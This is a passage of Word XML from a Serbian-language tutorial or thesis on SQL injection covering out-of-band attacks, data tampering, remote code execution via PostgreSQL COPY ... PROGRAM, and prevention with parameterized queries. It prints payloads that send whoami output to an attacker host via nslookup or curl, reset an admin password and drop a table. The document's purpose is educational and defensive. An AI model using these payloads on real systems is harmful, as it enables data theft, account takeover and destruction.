          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, koja šalje rezultat izvršenja </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">whoami </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ka serveru pod kontrolom napadača.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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 bi payload koji koristi DNS protokol izgledao kao sledeći:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B3">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COPY users TO PROGRAM 'nslookup $(</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:color w:val="ffffff"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="black"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">whoami</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="ffffff"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="black"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">).attacker-website.com';--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B4">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gde se pokretanjem komande </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nslookup</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> kreira DNS zahtev ka serveru napadača. Rezultat može biti zapis u okviru logova DNS servera, što omogućuje napadaču da indirektno prikupi podatke, konkretno informacije o trenutnom korisniku (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">whoami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B5">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_9xj6xelqr2et" w:id="20"/>
      <w:bookmarkEnd w:id="20"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2.3 Napadi sa ciljem manipulacije baze podataka</w:t>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Dosadašnji primeri su bili demonstracija napada čiji je cilj zaobilaženje logike osnovnog upita, kao i čitanju i ekstrakciji podataka koji nisu predviđeni. Međutim, u praksi postoje i napadi višeg nivoa, gde napadač može direktno da manipuliše strukturom baze podataka ili samim podacima. Ovakvi napadi se mogu podeliti u dve kategorije:</w:t>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Modifikacija podataka</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B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r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">orišćenje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UPDATE</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> ili </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ALTER</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> komandi da bi se promenili postojeći podaci ili struktura tabela, gde je primer payload-a:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001BC">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OR 1=1; UPDATE users SET password='newpassword' WHERE username='admin'; --</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B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Ovakav napad dovodi do promene administratorske lozinke.</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001BE">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Brisanje podataka</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B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r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">orišćenje </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">DELETE</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> ili </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">DROP</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> komandi za uklanjanje podataka ili čitavih tabela, gde je primer payload-a:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C1">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OR 1=1; DROP TABLE messages; --</w:t>
      </w:r>
    </w:p>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Ovim payload-om se briše tabela </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">messages</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, čime dolazi do gubitka svih podataka o porukama.</w:t>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realnom okruženju, uspešnost ovakvih napada zavisi od faktora kao što su privilegije korisnika baze podataka, konfiguracije same aplikacije i ograničenja definisanih u šemi baze podataka. Takođe, pojedini tipovi baza podataka zahtevaju korišćenje specifične sintakse ili podešavanja kako bi podržale upite koji sadrže više izraza.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C5">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_kd932o23lw2j" w:id="21"/>
      <w:bookmarkEnd w:id="21"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2.4 Remote Code Execution (RCE) preko SQLi</w:t>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prethodnom poglavlju prikazano je da se SQLi napadi ne moraju striktno odnositi na ekstrakciju podataka ili zaobilaženje i promenu logike originalnog upita, već i da je moguće uticati na same podatke i strukturu baze podataka ukoliko se proslede odgovarajuće naredbe. U ovom poglavlju je fokus na scenarijima u kojima se SQLi može iskoristiti kao osnova za ekalaciju napada i efekte koji se ne ograničavaju samo na bazu podataka, već potencijalno i na sistem na kome se ona nalazi.</w:t>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r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Remote Code Execution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RCE</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) predstavlja napad koji omogućuje napadaču da pokreće proizvoljne komande ili kod na ranjivom sistemu. SQLi može biti jedan od vektora za RCE, naročito kada baza ili DBMS imaju visoke privilegije ili kada je moguće koristiti specijalne funkcije koje interaguju sa operativnim sistemom.</w:t>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Efekti RCE napada mogu biti veoma ozbiljni i zavise od konfiguracije sistema. Napadač može preuzeti kontrolu nad sistemom, pristupiti poverljivim podacima, instalirati malver ili trajne backdoor-ove, kao i da koristi kompromitovan sistem za napade na druge uređaje u istoj mreži. Pored toga, RCE može omogućiti eskalaciju privilegija, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Denial of Service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DoS</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) napade ili manipulaciju konfiguracionih fajlova i aplikacija. Zbog navedenih posledica, SQLi koji omogućuje RCE predstavlja značajan sigurnosni rizik.</w:t>
      </w:r>
    </w:p>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nastavku će biti prikazani osnovni princip RCE napada, vidljiv na slici 28:</w:t>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930" cy="651639"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="8"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34930" cy="651639"/>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28 - RCE demonstracija</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D1">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Sintaksa </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="ffffff"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="black"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">COPY … FROM PROGRAM</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> je prethodno predstavljena u okviru poglavlja </w:t>
      </w:r>
      <w:hyperlink w:anchor="_fsi6yes09mgo">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Out-of-Band napadi</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> i koristi se radi kopiranja podataka u zadatu tabelu. U ovom primeru, komanda je iskorišćena u maliciozne svrhe, tako da se pokrene </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">komanda </w:t>
      </w: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koja prikazuje trenutnog korisnika na sistemu i njegove grupe.</w:t>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Iako je došlo do greške prilikom izvršenja payload-a, greška nastaje zbog originalne svrhe kopiranja podataka u tabelu. Konkretno, nakon izvršenja komande </w:t>
      </w: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upit pokušava da rezultate te komande upiše u tabelu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gde prva kolona očekuje celobrojni podatak, a ne string.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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Činjenica da se komanda </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">id </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ipak izvršila ilustruje da napadač može iskoristiti SQL za izvršenje proizvoljnih komandi na sistemu, naročito kada korisnik baze podataka ima visoke privilegije.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D5">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_b9yq3juw1pk4" w:id="22"/>
      <w:bookmarkEnd w:id="22"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2.5 Prevencija SQLi napada</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Dosadašnji primeri su se zasnivali na backend logici koja koristi jednostavnu konkatenaciju stringova prilikom formiranja upita. Iz ovog razloga, bilo je trivijalno umetnuti proizvoljan tekst unutar upita, računajući i specijalne karaktere i izraze koji utiču na samu logiku upita.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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Glavni način prevencije SQLi napada je korišćenje tzv. parametrizovanih upita ili pripremljenih izraza (eng. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Prepared statements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Prilikom korišćenja parametrizovanih upita se jasno razdvaja SQL koda od podataka. Sam upit se definiše sa unapred postavljenim oznakama, tzv. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Placeholders</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, na mestima gde će se nalaziti parametri, dok se vrednosti parametara prosleđuju odvojeno. Na taj način baza podataka razume da prosleđeni parametri nisu deo SQL koda, te ih neće interpretirati kao takve. Ovakav pristup onemogućava da se maliciozan unos (payload) protumači kao SQL instrukcija, već ostaje običan string literal koji ne može promeniti logiku upita.</w:t>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slici 29a) prikazan je isečak koda koji ilustruje kreiranje nesigurnog upita korišćenjem konkatenacije stringova. Na slici 29b) je vidljiv ispravan pristup sa parametrizovanim upitom, gde se korisnički podaci prosleđuju nezavisno od same SQL instrukcije:</w:t>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5438" cy="1515948"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="41"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405438" cy="151594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0188" cy="1931751"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1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310188" cy="1931751"/>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Slike 29 a) i b) - Primer ranjivog i sigurnog upita, respektivno</w:t>
      </w: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Parametrizovani upiti predstavljaju rešenje koje pokriva veliki broj slučajeva, posebno prilikom korišćenja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klauzula, kao i pri prosleđivanju vrednosti u okviru </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">INSERT</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> ili </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>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izraza.</w:t>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Postoje situacije u kojima se ne mogu primeniti, kao što je dinamičko određivanje naziva tabela ili kolona, kao i u okviru </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ORDER BY</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> klauzula. U takvim slučajevima se preporučuje korišćenje lista dozvoljenih vrednosti, tzv. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Whitelists</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, ili primena drugačije logike kojom se ostvaruje potrebna funkcionalnost, ali bez rizika od SQLi napada. Sa druge strane, moguće je koristiti i liste nedozvoljenih vrednosti, tzv. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Blacklists</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, ali se one generalno ne preporučuju s obzirom da je znatno teže predvideti svaki mogući unos koji može biti nevalidan ili maliciozan.</w:t>
      </w:r>
    </w:p>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Osim mera zaštite koje se odnose na filtriranje korisničkog unosa, od velikog je značaja i revizija privilegija svakog korisničkog naloga koji se koristi za pristup bazi podataka. Preporučuje se primena principa najmanjih privilegija (eng. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
